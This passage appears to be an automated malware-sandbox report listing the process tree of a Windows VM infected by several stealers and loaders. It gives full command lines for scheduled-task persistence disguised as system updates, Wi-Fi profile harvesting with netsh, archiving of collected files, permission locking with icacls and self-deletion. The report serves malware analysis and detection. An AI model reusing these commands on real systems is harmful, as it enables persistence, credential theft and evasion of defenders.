                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            6⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:5704
                                          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                            C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                                            6⤵
                                              PID:7996
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              6⤵
                                              • Modifies data under HKEY_USERS
                                              PID:2948
                                            • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                              C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                                              6⤵
                                                PID:5008
                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                6⤵
                                                • DcRat
                                                • Creates scheduled task(s)
                                                PID:6224
                                      • C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
                                        2⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2060
                                      • C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3440
                                    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                      C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                      1⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1816
                                    • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                      C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:1932
                                      • C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000087001\amadka.exe"
                                        2⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:3016
                                      • C:\Users\Admin\AppData\Local\Temp\1000100001\NewB.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000100001\NewB.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4580
                                      • C:\Users\Admin\AppData\Local\Temp\1000107001\redlinepanel.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000107001\redlinepanel.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4300
                                      • C:\Users\Admin\AppData\Local\Temp\1000111001\goldprimeldlldf.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1000111001\goldprimeldlldf.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2580
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          3⤵
                                            PID:3060
                                        • C:\Users\Admin\AppData\Local\Temp\1000113001\32456.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000113001\32456.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1940
                                        • C:\Users\Admin\AppData\Local\Temp\1000118001\alex1234.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1000118001\alex1234.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:1252
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            3⤵
                                              PID:1632
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                              3⤵
                                                PID:2504
                                                • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
                                                  "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4108
                                                • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
                                                  "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4408
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                                                  4⤵
                                                    PID:224
                                                    • C:\Windows\SysWOW64\choice.exe
                                                      choice /C Y /N /D Y /T 3
                                                      5⤵
                                                        PID:5684
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:212
                                                  • C:\Windows\system32\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                                    3⤵
                                                    • Blocklisted process makes network request
                                                    • Loads dropped DLL
                                                    PID:5532
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh wlan show profiles
                                                      4⤵
                                                        PID:5612
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\772066395907_Desktop.zip' -CompressionLevel Optimal
                                                        4⤵
                                                          PID:3068
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                      2⤵
                                                      • Blocklisted process makes network request
                                                      • Loads dropped DLL
                                                      PID:5676
                                                  • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                    C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:3376
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E8A6.bat" "
                                                    1⤵
                                                      PID:5628
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                        2⤵
                                                          PID:5784
                                                      • C:\Users\Admin\AppData\Local\Temp\23FA.exe
                                                        C:\Users\Admin\AppData\Local\Temp\23FA.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5896
                                                        • C:\Users\Admin\AppData\Local\Temp\23FA.exe
                                                          C:\Users\Admin\AppData\Local\Temp\23FA.exe
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          PID:5956
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls "C:\Users\Admin\AppData\Local\14c8621b-a783-41b7-bf70-a7c55134ee3e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                            3⤵
                                                            • Modifies file permissions
                                                            PID:5244
                                                          • C:\Users\Admin\AppData\Local\Temp\23FA.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\23FA.exe" --Admin IsNotAutoStart IsNotTask
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:5456
                                                            • C:\Users\Admin\AppData\Local\Temp\23FA.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\23FA.exe" --Admin IsNotAutoStart IsNotTask
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:5568
                                                              • C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build2.exe
                                                                "C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build2.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:6136
                                                                • C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build2.exe
                                                                  "C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build2.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:5204
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 1960
                                                                    7⤵
                                                                    • Program crash
                                                                    PID:5840
                                                              • C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build3.exe
                                                                "C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build3.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:5820
                                                                • C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build3.exe
                                                                  "C:\Users\Admin\AppData\Local\1d935b65-5dbc-49b8-9e25-135e17d0da62\build3.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:5748
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                    7⤵
                                                                    • DcRat
                                                                    • Creates scheduled task(s)
                                                                    PID:5712
                                                      • C:\Users\Admin\AppData\Local\Temp\3541.exe
                                                        C:\Users\Admin\AppData\Local\Temp\3541.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5636
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                          2⤵
                                                            PID:5804
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 804
                                                            2⤵
                                                            • Program crash
                                                            PID:6120
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                          1⤵
                                                            PID:5872
                                                          • C:\Users\Admin\AppData\Local\Temp\5ACB.exe
                                                            C:\Users\Admin\AppData\Local\Temp\5ACB.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:5124
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5D5D.bat" "
                                                            1⤵
                                                              PID:5708
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                2⤵
                                                                  PID:5628
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                  2⤵
                                                                    PID:6088
                                                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:3568
                                                                • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:5900
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:2784
                                                                • C:\Windows\system32\browser_broker.exe
                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                  1⤵
                                                                  • Modifies Internet Explorer settings
                                                                  PID:5384
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5920
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Modifies Internet Explorer settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:4540
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Modifies registry class
                                                                  PID:4968
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Modifies registry class
                                                                  PID:4164
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Modifies registry class
                                                                  PID:5964
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                  • Modifies registry class
                                                                  PID:6324
                                                                • C:\Users\Admin\AppData\Local\Temp\6F89.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\6F89.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:6844
                                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                    2⤵
                                                                      PID:6000
                                                                  • C:\Users\Admin\AppData\Local\Temp\8302.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\8302.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5328
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                      2⤵
                                                                        PID:6836
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 848
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:1100
                                                                    • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                      1⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:4884
                                                                    • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:6632
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5740
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4344
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                          3⤵
                                                                          • DcRat
                                                                          • Creates scheduled task(s)
                                                                          PID:2772
                                                                    • C:\Users\Admin\AppData\Local\Temp\93BD.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\93BD.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:6284
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -nologo -noprofile
                                                                        2⤵
                                                                          PID:1780
                                                                        • C:\Users\Admin\AppData\Local\Temp\93BD.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\93BD.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                          PID:6948
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -nologo -noprofile
                                                                            3⤵
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:3892
                                                                      • C:\Windows\explorer.exe
                                                                        explorer.exe
                                                                        1⤵
                                                                        • Modifies Installed Components in the registry
                                                                        • Enumerates connected drives
                                                                        • Drops file in Windows directory
                                                                        • Checks SCSI registry key(s)
                                                                        • Modifies registry class
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:7136
                                                                        • C:\Users\Admin\AppData\Local\Temp\2880.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\2880.exe
                                                                          2⤵
                                                                            PID:5468
                                                                          • C:\Users\Admin\AppData\Local\Temp\31C8.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\31C8.exe
                                                                            2⤵
                                                                              PID:2496
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                3⤵
                                                                                  PID:6256
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 820
                                                                                  3⤵
                                                                                  • Program crash
                                                                                  PID:5936
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                                PID:3600
                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                1⤵
                                                                                  PID:5632
                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:6868
                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Enumerates system info in registry
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:7116
                                                                                  • C:\Windows\windefender.exe
                                                                                    C:\Windows\windefender.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:4556
                                                                                  • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:1104
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4140
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:6956
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1136
                                                                                  • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:5656
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2356
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:400
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:6732
                                                                                  • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:4192
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\1001036001\NewB.exe
                                                                                    1⤵
                                                                                      PID:2408
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      1⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:5648
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        2⤵
                                                                                          PID:1228
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5364
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies registry class
                                                                                        PID:3020
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4616
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:6608
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies registry class
                                                                                        PID:4036
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies registry class
                                                                                        PID:4088
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:6448
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          PID:8040
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:7340
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          PID:7604
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
